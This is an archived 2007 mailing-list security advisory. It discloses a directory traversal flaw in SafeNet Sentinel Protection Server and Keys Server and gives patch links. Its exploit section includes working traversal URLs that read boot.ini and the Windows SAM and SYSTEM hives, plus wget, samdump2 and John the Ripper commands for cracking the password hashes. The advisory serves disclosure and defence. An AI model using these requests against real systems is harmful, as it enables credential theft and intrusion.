Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Directory Traversal in SafeNet Sentinel Protection Server and Keys Serve

from [Elliot Kendall] Network Security [Permanent Link]
Subject: Directory Traversal in SafeNet Sentinel Protection Server and Keys Server
Date: Mon, 26 Nov 2007 16:06:11 -0500 
SUMMARY
=======

SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server
products include web servers which are vulnerable to directory
traversal attacks. A remote attacker could exploit these
vulnerabilities to read arbitrary files with the permissions of the web
server, typically SYSTEM.

AFFECTED SOFTWARE
=================

* Sentinel Protection Server 7.0.0 through 7.4.0 and possibly below
* Sentinel Keys Server 1.0.3 and possibly below

UNAFFECTED
==========

* Sentinel Protection Server 7.4.1
* Sentinel Keys Server 1.0.4

IMPACT
======

A remote attacker could exploit this vulnerability to read sensitive
files on the affected system. Attractive targets include the SAM
registry hive which contains system password hashes.

DETAILS
=======

Sentinel Protection Server and Sentinel Keys Server run web servers on
ports 6002 and 7002, respectively, to allow remote monitoring of key
use. The web server software does not santize request paths correctly
before using them in system calls. As a result, an attacker can request
files outside the web server's directory root by using the ../ notation
to refer to the parent directory of the current directory.

SOLUTION
========

Upgrade to Sentinel Protection Server 7.4.1 and Sentinel Keys Server
1.0.4.

First upgrade the Sentinel Driver software to 7.4.0 if you are using an
earlier version.

http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip

Then install "Security Patch to Sentinel Protection Installer 7.4.0"

http://safenet-inc.com/support/files/SPI740SecurityPatch.zip

EXPLOIT
=======

Most popular web browsers are not be able to display URLs exploiting
this problem. I recommend using wget or lynx instead.

Substitute port 7002 to target Keys Server instead of Protection
Server.

This example will retrieve the C:\boot.ini file.

http://XX.XX.XX.XX:6002/../../../../../../boot.ini

This example will retrieve a copy of the target system's SAM registry
hive from the Windows repair folder:

http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam

With the SAM and SYSTEM registry hives, it is possible to extract the
system's local password hashes for offline cracking. For example, using the
bkhive, samdump2, and John the Ripper tools:

$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=all hashes

http://ophcrack.sourceforge.net/bkhive.php
http://www.openwall.com/john/

ACKNOWLEDGMENTS
===============

Thanks to SafeNet for patching this vulnerability and for working with
me on this advisory.

According to Digital Defense, Inc.'s advisory, Corey Lebleu originally
discovered this problem on October 10th, 2007. I discovered the same
vulnerability independently on October 29th, 2007. I have no reason to
doubt Digital Defense, Inc.'s claim, and do not claim to have
discovered the problem first.

REVISION HISTORY
================

2007-11-26  original release

-- 
Elliot Kendall <ekendall@brandeis.edu>
Network Security Architect
Brandeis University

Trouble replying? See http://people.brandeis.edu/~ekendall/sign/

Attachment: smime.p7s
Description: S/MIME cryptographic signature

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Directory Traversal in SafeNet Sentinel Protection Server and Keys Server, Elliot Kendall <=
Previous by Date:  PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source / DB Credentials Disclosure, kingoftheworld92
Next by Date:  JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability, sys-project
Previous by Thread:  PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source / DB Credentials Disclosure, kingoftheworld92
Next by Thread:  JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability, sys-project
Indexes:  [Date] [Thread] [Top] [All Lists]